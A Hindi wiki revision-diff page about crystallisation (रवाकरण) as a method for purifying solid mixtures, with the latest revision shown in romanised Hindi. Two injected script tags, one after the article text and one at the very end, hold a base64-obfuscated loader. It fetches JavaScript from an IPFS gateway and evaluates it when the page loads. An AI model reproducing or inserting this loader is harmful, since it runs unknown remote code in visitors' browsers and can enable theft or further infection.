Difference between revisions of "रवाकरण"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "पृथक " to "पृथक् ")
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Crystallisation) [[रसायन विज्ञान]] में रवाकरण विधि के द्वारा [[अकार्बनिक]] [[ठोस]] [[मिश्रण]] को अलग किया जाता है। इस विधि में अशुद्ध ठोस मिश्रण को उचित विलायक के साथ मिलाकर गर्म किया जाता है तथा गर्म अवस्था में ही कीप द्वारा छान लिया जाता है। छानने के बाद विलयन को कम [[ताप]] पर धीरे-धीरे ठण्डा किया जाता है। ठण्डा होने पर शुद्ध पदार्थ रवे (क्रिस्टल) के रूप में विलियन से पृथक हो जाता है। जैसे- शर्करा और [[नमक]] के मिश्रण को [[इथाइल अल्कोहल]] में 348 केल्विन (K) ताप पर गर्म कर इस विधि द्वारा अलग किया जाता है।
+
([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Crystallisation) किसी [[पदार्थ]] को रासायनिक अभिक्रिया या भौतिक उपचार से रवादार [[ठोस]] बनाने की क्रिया को रवाकरण कहते है।
 +
;विधि
 +
[[रसायन विज्ञान]] में रवाकरण विधि के द्वारा अकार्बनिक [[ठोस]] [[मिश्रण]] को अलग किया जाता है। इस विधि में अशुद्ध ठोस मिश्रण को उचित विलायक के साथ मिलाकर गर्म किया जाता है तथा गर्म अवस्था में ही कीप द्वारा छान लिया जाता है। छानने के बाद विलयन को कम [[ताप]] पर धीरे-धीरे ठण्डा किया जाता है। ठण्डा होने पर शुद्ध पदार्थ रवे (क्रिस्टल) के रूप में विलियन से पृथक् हो जाता है। जैसे- शर्करा और [[नमक]] के मिश्रण को [[इथाइल अल्कोहल]] में 348 केल्विन (K) ताप पर गर्म कर इस विधि द्वारा अलग किया जाता है।
  
 
{{प्रचार}}
 
{{प्रचार}}
Line 9: Line 11:
 
|शोध=
 
|शोध=
 
}}
 
}}
 
+
==संबंधित लेख==
 +
{{रसायन विज्ञान}}
 
[[Category:रसायन विज्ञान]]
 
[[Category:रसायन विज्ञान]]
 
[[Category:विज्ञान_कोश]]
 
[[Category:विज्ञान_कोश]]
  
 
__INDEX__
 
__INDEX__

Latest revision as of 13:30, 1 August 2017

(aangrezi:Crystallisation) kisi padarth ko rasayanik abhikriya ya bhautik upachar se ravadar thos banane ki kriya ko ravakaran kahate hai.

vidhi

rasayan vijnan mean ravakaran vidhi ke dvara akarbanik thos mishran ko alag kiya jata hai. is vidhi mean ashuddh thos mishran ko uchit vilayak ke sath milakar garm kiya jata hai tatha garm avastha mean hi kip dvara chhan liya jata hai. chhanane ke bad vilayan ko kam tap par dhire-dhire thanda kiya jata hai. thanda hone par shuddh padarth rave (kristal) ke roop mean viliyan se prithakh ho jata hai. jaise- sharkara aur namak ke mishran ko ithail alkohal mean 348 kelvin (K) tap par garm kar is vidhi dvara alag kiya jata hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>